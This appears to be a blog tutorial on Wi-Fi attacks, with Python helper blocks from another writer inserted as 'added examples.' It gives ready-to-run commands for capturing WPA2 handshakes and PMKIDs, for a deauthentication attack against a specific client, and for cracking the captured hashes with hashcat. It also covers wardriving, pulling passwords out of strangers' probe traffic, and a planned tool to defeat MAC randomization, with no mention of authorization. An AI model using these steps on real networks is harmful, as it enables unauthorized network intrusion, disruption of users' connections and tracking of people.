Bread and Butter Wifi Attacks and Hash Cracking

Wi-Fi cracking is a fundamental skill. We’re looking at the Aircrack-ng suite alongside the other tools that make up the current state of the art in WPA2 hash capturing and cracking.

Aircrack-ng Setup

We’re gonna work with root permissions most of the time.

```bash
$ sudo -i
```

For those using the RTL8812AU chipset, installing the driver is straightforward.

```bash
$ git clone -b v5.6.4.2 https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl8812au
$ make install
```

Managing Drivers

Removing and reinstalling network drivers can often resolve issues with device compatibility.

```bash
$ dpkg -r realtek-rtl88xxau-dkms
$ dpkg -r realtek-rtl8814au-dkms
```

Repo Drivers

Be careful when going with drivers from the repos - most of the time you’ll end up in more trouble.

```bash
$ apt install realtek-rtl88xxau-dkms
$ apt install btscanner aircrack-ng kismet
$ pip3 install kismet_rest deepdiff
```

Device Configuration

Before launching any attacks, confirm that your network devices are properly recognized and configured:

```bash
$ dmesg | grep 88xx
$ iwconfig
```

More useful commands

```bash
$ lsmod
$ blkid
$ lsblk
$ lsusb
```

Process Management

We noticed a better success rate when killing the processes like this instead of the airmon-ng way; this might be system or adapter specific.

```bash
# the process name is wpa_supplicant (underscore), not wpa-supplicant
$ killall wpa_supplicant NetworkManager
```

Alternatively, you can use airmon-ng to manage interfering processes.

```bash
$ airmon-ng check kill
```

Initiating Monitor Mode

Monitor mode is essential for capturing packets.

```bash
$ airmon-ng start wlan0 wlan1
```

Dumping Hashes

Kismet

Kismet allows for detailed network scanning using multiple adapters.

```bash
$ kismet -c wlan0 -c wlan1
```

airodump-ng

The de facto standard still works great, even though more sophisticated tools are available today.

```bash
# -w sets the dump file prefix; -o is the short form of --output-format
$ airodump-ng -w dump01 --output-format pcap wlan0,wlan1
```

More useful params

```bash
--essid MyWifiAP
--bssid ...
-b abg (bands 2.4/5Ghz)
-c 1 (channel)
--essid-regex ".*Vag\|VAG\|vag{1}.*"
-d "CIA Surveillance Van"
-t OPN
```

hc-tools

hcxdumptool

For more targeted attacks, tools like hcxdumptool are useful for capturing newer hash types such as PMKID. However, PMKID availability is rare in practice, so you might not get what you expect. We found little to no noticeable advantage in dumping directly with the hcx tools over using airodump; this may of course be region or target dependent.

We’re still very happy about the development of hcx tools as well as overall progress in Wifi dumping / cracking tools.

```bash
$ hcxdumptool -i wlan0 -o dump02.pcapng
```

Converting capture files

Convert the capture files for processing with hashcat:

```bash
$ apt install hcxtools
$ hcxpcapngtool -o pcapng_hashes *.cap
```

Deauthentication Attacks

A simple deauthentication attack can disconnect clients from their access points:

```bash
$ aireplay-ng --deauth 200 -a BA:A2:34:22:E7:68 -c 6D:A7:EC:3A:47:58 wlan0
```

Cracking Hashes

Using Aircrack-ng for local cracking is straightforward but can be slow:

aircrack-ng

```bash
$ aircrack-ng dump.pcap -w wordlist.txt
```

Hashcat

```bash
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i --increment-min=3 -1 ?l?d -2 ?u?l?d hashes.pcapng rockyou.txt ?2?1?1?1?s?s
$ .\hashcat.exe -m 22000 -d 2 -a 6 -i -1 "?l?d!_-+*$" hashes.pcapng wpa2_ultimate.txt ?1?1?1?1
```
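As an added example (our own code, not the blog's), the following works out how many candidates the masks in those two commands produce, including the -1/-2 custom charsets and -i/--increment-min; the charset sizes are hashcat's documented ones, and the wordlist line count for a hybrid run is a value you supply.

```python
# Added example (not from the original post): count the candidates a hashcat
# mask produces, honouring -1..-4 custom charsets and -i/--increment-min, so a
# hybrid (-a 6) run like the ones above can be sized before it is started.
import string
from math import prod

# hashcat built-ins; ?s is space plus 32 punctuation marks, ?a all 95 printables
BUILTIN = {"l": set(string.ascii_lowercase), "u": set(string.ascii_uppercase),
           "d": set(string.digits), "s": set(" " + string.punctuation)}
BUILTIN["a"] = set().union(*BUILTIN.values())

def tokenize(mask):
    """Split a mask or charset spec into tokens: '?2?1a' -> ['?2', '?1', 'a']."""
    toks, i = [], 0
    while i < len(mask):
        step = 2 if mask[i] == "?" and i + 1 < len(mask) else 1
        toks.append(mask[i:i + step])
        i += step
    return toks

def parse_charset(spec, custom=None):
    """Characters covered by a spec such as '?l?d!_-+*$': '?x' expands to a
    built-in or custom set, '??' is a literal '?', anything else is literal."""
    custom, chars = custom or {}, set()   # a set: overlapping tokens count once
    for tok in tokenize(spec):
        if len(tok) == 1 or tok == "??":
            chars.add(tok[-1])
        elif tok[1] in BUILTIN:
            chars |= BUILTIN[tok[1]]
        elif tok[1] in custom:
            chars |= custom[tok[1]]
        else:
            raise ValueError(f"unknown charset {tok}")
    return chars

def mask_keyspace(mask, custom_specs=None, increment_min=None):
    """Candidates for one mask. custom_specs maps '1'..'4' to the -1..-4 specs
    (a later one may reference an earlier one); increment_min sums the lengths
    increment_min..len(mask), which is what -i does."""
    custom = {}
    for key, spec in (custom_specs or {}).items():
        custom[key] = parse_charset(spec, custom)
    sizes = [len(parse_charset(tok, custom)) for tok in tokenize(mask)]
    if increment_min is None:
        return prod(sizes)
    return sum(prod(sizes[:k]) for k in range(increment_min, len(sizes) + 1))

def hybrid_keyspace(wordlist_lines, mask, custom_specs=None, increment_min=None):
    """-a 6: every mask candidate is appended to every word of the list."""
    return wordlist_lines * mask_keyspace(mask, custom_specs, increment_min)
```

For the first command, `mask_keyspace("?2?1?1?1?s?s", {"1": "?l?d", "2": "?u?l?d"}, increment_min=3)` gives about 3.2 billion mask candidates per word, which is why --stdout on a tiny wordlist is worth a look before committing a GPU to it.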

Display SSIDs

https://github.com/Network-Sec/bin-tools-pub/blob/main/hashdump_to_ssid.py

We made a little bin tool to display SSIDs from hashdump files.
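As an added illustration (our own code, not the linked hashdump_to_ssid.py), here is a small parser for the hashcat 22000 format that lists the ESSIDs in a hash file and shows whether each entry came from a PMKID or from an EAPOL handshake; the sample lines are constructed dummies of the right shape.

```python
# Added example, not the linked hashdump_to_ssid.py: read a hashcat 22000 file
# and report, per ESSID, how many PMKID and how many EAPOL (4-way handshake)
# entries it holds, which tells you what the capture actually got you.
from collections import Counter, defaultdict

# hc22000 line layout, nine '*'-separated fields:
# WPA*TYPE*PMKID_or_MIC*MAC_AP*MAC_CLIENT*ESSID_hex*ANONCE*EAPOL*MESSAGEPAIR
# TYPE 01 = PMKID entry (last three fields empty), TYPE 02 = EAPOL/MIC entry.
TYPES = {"01": "PMKID", "02": "EAPOL"}

def parse_hc22000_line(line):
    """One record as a dict, or None for a line that is not a WPA*... entry."""
    parts = line.strip().split("*")
    if len(parts) != 9 or parts[0] != "WPA" or parts[1] not in TYPES:
        return None
    try:
        essid = bytes.fromhex(parts[5]).decode("utf-8", errors="replace")
    except ValueError:          # odd length or non-hex ESSID field
        return None
    return {"type": TYPES[parts[1]], "ap": parts[3].lower(),
            "client": parts[4].lower(), "essid": essid}

def essid_summary(lines):
    """{essid: Counter({'PMKID': n, 'EAPOL': m})} over an iterable of lines."""
    summary = defaultdict(Counter)
    for line in lines:
        rec = parse_hc22000_line(line)
        if rec:
            summary[rec["essid"]][rec["type"]] += 1
    return summary

# Constructed sample file: MACs, MIC/PMKID, ANONCE and EAPOL fields are dummy
# hex of the right shape; 4d7957696669 = "MyWifi", 436166c3a9 = "Café".
SAMPLE_HC22000 = """\
WPA*01*0123456789abcdef0123456789abcdef*001122334455*aabbccddeeff*4d7957696669***
WPA*02*fedcba9876543210fedcba9876543210*001122334455*aabbccddeeff*4d7957696669*\
1111111111111111111111111111111111111111111111111111111111111111*0203005f02010a00*02
WPA*02*00112233445566778899aabbccddeeff*66554433221100*ffeeddccbbaa*436166c3a9*\
2222222222222222222222222222222222222222222222222222222222222222*0203005f02010a00*02
not a hash line
"""

if __name__ == "__main__":
    for essid, counts in essid_summary(SAMPLE_HC22000.splitlines()).items():
        print(f"{essid!r}: {dict(counts)}")
```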

EAPOL

Capturing the complete 4-way handshake including EAPOL isn’t as important as hcxpcapngtool and some hashcat forum posts may make it sound. airodump-ng still delivers in certain scenarios, sometimes even faster and better than hcxdumptool.

The conversion works despite the tool complaining, and the resulting hashes are the same. The PMKID attack is of course a different story, but our finding is that many modern routers have been patched and are no longer vulnerable to it, while WPA2 hashes can still be captured the traditional way.

Tshark and Tcpdump

Don’t skip learning about Tshark and Tcpdump. They will deliver much needed insight into how this works, and also give you easy methods to do manually what hcxpcapngtool does, with custom options of your choosing.

Wordlists

Wordlists specific to Wifi. We created a couple of Wordlist Generator helper tools; you can find them in our GitHub:
https://github.com/Network-Sec/Wordlists

More Wordlist resources:

Important: We get a massive speed and success rate gain if we exclude words shorter than 8 chars, as this is the minimum passphrase length for WPA2.

```bash
$ cat rockyou.txt | grep --binary-files=text -Pe "^[\w\d\s]{8,32}$" | sort -u > wifi_rockyou.txt
```

Wigle.net

Take wardriving to pro level and easily find where beacons were collected. Even with a stationary airodump it will give you superpowers. We already developed a JSON similarity clustering algorithm a while ago (on our GitHub); exporting csv, kismet and pcap format at the same time with beacon traffic dumping enabled is very easy. It’s been on our TODO list for a while to build a MAC randomization de-anonymizer via beacon traffic and other device factors; it’s likely the next project we try to finish.

Also, wigle.net offers an Android app we haven’t tested yet, as we use our Nethunter phone with airodump and hcxtools as our EDC wardriver.

Beacons

Beacons can not only be used for some unspecific tracking (you don’t have any time information); often people accidentally leave entire passwords in their beacon traffic.

```bash
# for every airodump CSV, take the rows after the "Probed ESSIDs" header and
# keep columns 7+ (the probed ESSIDs), dropping empty lines
$ for f in $(grep -Hnai "Probed ESSIDs" *.csv | cut -d ":" -f 1); do awk '/Probed ESSIDs/ {found=1; next} found' "$f" | cut -d "," -f 7-99 | grep -P "[^\s]" >> beacons.txt; done
```

You may also want to deal with spaces in the final file; either way, you can use the beacons with rules to find more complex keys.
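The same extraction as an added Python example (our code, not from the original post), parsing airodump-ng’s CSV so each probed ESSID stays attached to the station MAC that probed for it, which also makes it easy to see which of your own client devices are broadcasting SSID names; the sample CSV is constructed.

```python
# Added example (not from the original post): the awk/cut pipeline above, done
# as a parser for airodump-ng's CSV so each probed ESSID stays tied to the
# client MAC that sent it. The same list shows which of your own devices are
# leaking SSID names in probe requests.
from collections import defaultdict

STATION_HEADER = "Station MAC"   # starts the second section of airodump's CSV

def probed_essids(csv_text):
    """Map station MAC -> list of probed ESSIDs from airodump-ng CSV text.
    The station section has 6 fixed columns; everything from column 7 on is
    one probed ESSID per comma, which is why the shell version uses -f 7-99."""
    result = defaultdict(list)
    in_stations = False
    for line in csv_text.splitlines():
        if line.startswith(STATION_HEADER):
            in_stations = True
            continue
        if not in_stations or not line.strip():
            continue
        fields = [f.strip() for f in line.split(",")]
        if len(fields) < 7:
            continue
        mac = fields[0].lower()
        for essid in fields[6:]:
            if essid and essid not in result[mac]:   # skip empty, keep order
                result[mac].append(essid)
    return dict(result)

def all_probed(csv_text):
    """Deduplicated ESSIDs across all stations (what beacons.txt ends up holding)."""
    seen = []
    for essids in probed_essids(csv_text).values():
        seen.extend(e for e in essids if e not in seen)
    return seen

# Constructed sample in airodump-ng's CSV layout (MACs, times and names made up).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2025-01-01 10:00:00, 2025-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   6, MyWifi, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
aa:bb:cc:dd:ee:01, 2025-01-01 10:00:00, 2025-01-01 10:05:00, -50,       12, 00:11:22:33:44:55,MyWifi
aa:bb:cc:dd:ee:02, 2025-01-01 10:01:00, 2025-01-01 10:04:00, -60,        3, (not associated) ,HomeNet,Cafe Guest
aa:bb:cc:dd:ee:03, 2025-01-01 10:02:00, 2025-01-01 10:03:00, -70,        1, (not associated) ,
"""

if __name__ == "__main__":
    for mac, essids in probed_essids(SAMPLE_CSV).items():
        print(mac, essids)
```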

Automation

https://github.com/Network-Sec/bin-tools-pub/blob/main/wifi_dumper.sh

Next Up

We’ll follow up with a dedicated article about Hash Cracking Strategies, an applied field manual of modern techniques that help you tackle hashes which are more difficult than top-10000-wordlist passwords or 7 random chars.

In brief though:

  • Adapt the wordlist to the target, language, etc.
  • Pay attention: hashcat has nice modes, but verify using --stdout that rules or combos are applied correctly
  • If you have enough disk space, using large lists like the former crackstation list, or preparing your own, is still the best way
  • Put a rule over everything. We rarely run out of time, we mostly run out of words

Bonus: Then it stopped working

All our adapters, including laptop-internal adapters of various brands, worked fine and without issue; usually one driver or another, from the Kali apt archives, from aircrack-ng’s GitHub or at least an older third-party branch, made it work in minutes and without hassle. That was until we upgraded to or newly installed a Kali kernel > 6.4.x: suddenly it stopped working.

It took us days of trial and error, and finally a forensic comparison with the working driver on an older Kali VM we still had around, to get back to a running state.

So, TL;DR

```bash
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# How to Use Alfa AWUS036ACH in Monitor Mode with Kali Kernel > 6.4.1 #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

# We did it all as root
$ sudo -i

# Keeping a second window open on the side
$ dmesg -w

# 1. Clone the Repository and Checkout the Correct Commit
$ git clone https://github.com/aircrack-ng/rtl8812au.git
$ cd rtl8812au

# This is the last known-good commit for this model as of 2025-01-01
$ git checkout 63cf0b4

# 2. Fully Automatic Build and Install Using dkms.conf
# 2.1 Prepare the Source Directory
$ mkdir -p /usr/src/rtl8812au-5.6.4.2
$ cp -r . /usr/src/rtl8812au-5.6.4.2

# 2.2 Register the Module with DKMS
$ dkms add -m rtl8812au -v 5.6.4.2

# 2.3 Build and Install the Module
$ dkms autoinstall

# 3. Verify the Module Installation
$ dkms status

# Maybe more importantly, this line should look like it did in Kali < 6.5.0 again
$ airmon-ng

PHY     Interface       Driver          Chipset
phy0    wlan0           88XXau          Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter

# 4. Optional: try using it first (5.) before attempting the following steps
# Load and Test the Driver
$ modprobe 88XXau
$ iwconfig

# 5. Enable Monitor Mode and Test Packet Capture - may work even without kill
$ airmon-ng start wlan0
$ airodump-ng wlan0
```

Conclusion

“Welcome to the 21st Century. Where sex is free, but love is expensive. Where Pizza arrives faster than an Ambulance and a Smartphone is more important than dignity.”

“Welcome to the darkness, where lying is modern, treason is smart and poverty a flaw.”